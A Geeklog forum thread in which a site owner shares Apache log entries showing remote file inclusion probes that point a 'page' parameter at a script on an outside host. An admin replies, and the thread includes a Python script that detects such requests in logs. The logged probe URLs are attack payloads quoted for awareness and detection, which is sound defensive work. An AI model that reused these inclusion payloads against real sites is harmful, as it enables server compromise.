Geeklog Forums

Just commenting about hacking attempts.


joelbarrios

Forum User
Junior
Registered: 05/03/04
Posts: 23
Location:Mexico
Looking at Webalizer stats, I noted about a thousand referrals from a website I never heard about before. Having a closer look at the Apache access_log, I found hundreds of entries like this:

212.34.137.241 - - [08/Mar/2008:07:24:45 -0600] "GET /staticpages/index.php/instalando-mysql-php-solaris/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31880 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:47 -0600] "GET /index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 78689 "-" "libwww-perl/5.79"
212.34.137.241 - - [08/Mar/2008:07:24:53 -0600] "GET /staticpages/index.php/index.php?page=http://www.paintland.ru/newsite/modules/id.txt? HTTP/1.1" 200 31788 "-" "libwww-perl/5.79"

Seems somebody tried to run a code injection script hosted at http://www.paintland.ru/newsite/modules/id.txt (looks like a PHP Nuke blog about paintball in Russian). No damage done. My Geeklog website is running perfectly well and untouched and un-defaced.

Anyway, I felt it would be useful to share this with the Geeklog community, just in case.
--
https://www.AlcanceLibre.org/
https://blog.AlcanceLibre.org/
La libertad del conocimiento al alcance de quien la busca.
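
The requests in the log excerpt above all carry an absolute URL as the value of a query parameter. As an added example (not part of the original post and not Geeklog code), this Python script picks such requests out of Apache combined-format lines and counts them per client; the sample lines, addresses and the example.org host are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"'
)
# A parameter value that is itself an absolute URL is what these probes have in common.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_probes(lines):
    """Return one record per request with a remote URL in a query parameter."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        query = urlsplit(m["target"]).query
        # parse_qsl percent-decodes, so page=http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_RE.match(value):
                # status is kept for triage: 200 only means a page was served,
                # not that the remote file was included
                hits.append({"ip": m["ip"], "agent": m["agent"], "param": name,
                             "remote": value, "status": int(m["status"])})
                break
    return hits

def summarize(hits):
    """Count probes per (client IP, user agent) to see how noisy each source is."""
    return Counter((h["ip"], h["agent"]) for h in hits)

# Constructed sample lines (documentation addresses and example.org, not real traffic)
SAMPLE = [
    '192.0.2.10 - - [08/Mar/2008:07:24:45 -0600] "GET /index.php?page=http://files.example.org/id.txt? HTTP/1.1" 200 78689 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [08/Mar/2008:07:24:47 -0600] "GET /staticpages/index.php/index.php?page=http%3A%2F%2Ffiles.example.org%2Fid.txt%3F HTTP/1.1" 200 31788 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [08/Mar/2008:07:25:02 -0600] "GET /index.php?page=2 HTTP/1.1" 200 40210 "http://www.example.org/" "Mozilla/5.0"',
    '198.51.100.7 - - [08/Mar/2008:07:25:09 -0600] "GET /article.php?story=intro HTTP/1.1" 200 12001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (ip, agent), n in summarize(find_rfi_probes(SAMPLE)).most_common():
        print(f"{n:4d}  {ip}  {agent}")
```

Sites that legitimately pass full URLs in a parameter (redirect or share links, for instance) will show up too, so the per-client counts are a starting point for review rather than a block list.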

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Yeah, these have become a real pest - a complete waste of CPU and bandwidth. Not much you can do about them, though.

bye, Dirk